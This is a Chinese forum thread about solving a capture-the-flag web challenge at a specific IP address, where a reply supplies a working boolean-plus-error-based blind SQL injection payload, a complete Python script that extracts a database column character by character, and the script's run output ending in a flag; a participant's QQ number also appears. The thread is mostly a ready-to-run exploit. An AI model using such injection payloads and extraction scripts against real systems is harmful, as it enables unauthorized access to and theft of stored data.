求教一份web题目

http://124.16.75.162:40006
看到有：http://124.16.75.162:40006/hint.php?id=1

猜测是注入，没有看到回显，测试延时注入发现sleep等也被过滤了，也试了get_lock 不知道为什么不可以，有没有师傅会的呢。。。

向大佬学习

Echocipher 发表于 2018-12-13 11:20
谢谢师傅！能加一下您的联系方式嘛

可以啊，qq 1729888211

leixiao 发表于 2018-12-5 07:43
只会提示sql语句语法正不正确，所以同时利用报错函数和布尔盲注
payload：

谢谢师傅！能加一下您的联系方式嘛

只会提示sql语句语法正不正确，所以同时利用报错函数和布尔盲注
payload：

http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,1))%3E1,1,exp(~0))--+

贴上我的脚本

1. #-*- coding: utf-8 -*-
   
2. 
   
3. import requests
   
4. import re
   
5. 
   
6. requests=requests.session()
   
7. 
   
8. strall=[]
   
9. strall.append('0')
   
10. for i in range(33,128):
    
11.     strall.append(str(i))
    
12. 
    
13. 
    
14. def isthis(index,charascii,compare):
    
15.     headers={
    
16.         'Host': '124.16.75.162:40006',
    
17.                 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0',
    
18.                 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    
19.                 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    
20.                 'Connection': 'close',
    
21.                 'Upgrade-Insecure-Requests': '1'
    
22.     }
    
23.     url="http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,{}))".format(str(34-index))+compare+"{},1,exp(~0))--+".format(charascii)
    
24.     print url
    
25. 
    
26.     r=requests.get(url=url,headers=headers)
    
27. 
    
28.     a=True
    
29. 
    
30.     if r.text.find('sql')>=0:
    
31.         print 'false'
    
32.         a=False
    
33.     else:
    
34.         print 'true'
    
35.         a=True
    
36. 
    
37.     return a
    
38.         
    
39. 
    
40. 
    
41. 
    
42. ans=''
    
43. flag=0
    
44. for index in range(1,99):
    
45.     left=0
    
46.     right=len(strall)
    
47.     if flag:
    
48.         break
    
49. 
    
50.     while left<=right:
    
51.         mid=(left+right)>>1
    
52.         if isthis(index,strall[mid],">"):
    
53.             left=mid+1
    
54.         elif isthis(index,strall[mid],"<"):
    
55.             right=mid-1
    
56.         else:
    
57.             if strall[mid]=='0':
    
58.                 flag=1
    
59.                 break
    
60.             value=chr(int(strall[mid]))
    
61.             ans+=value
    
62.             print ans
    
63.             break
    
64. 
    
65. print ans
    
66. 
    
67. 
    
68. 
    
69. 
    
70. raw_input('done')
    
71. 
    

复制代码

发不了截图，就copy一下脚本最后的运行情况，，，

http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<43,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>37,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<37,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>34,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<34,1,exp(~0))--+
true
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))>0,1,exp(~0))--+
false
http://124.16.75.162:40006/hint.php?id=1%22%20and%20if(ascii(right(hint,0))<0,1,exp(~0))--+
false
flag{read_more_to_get_admin_pass}
done

求告知这是哪里的题？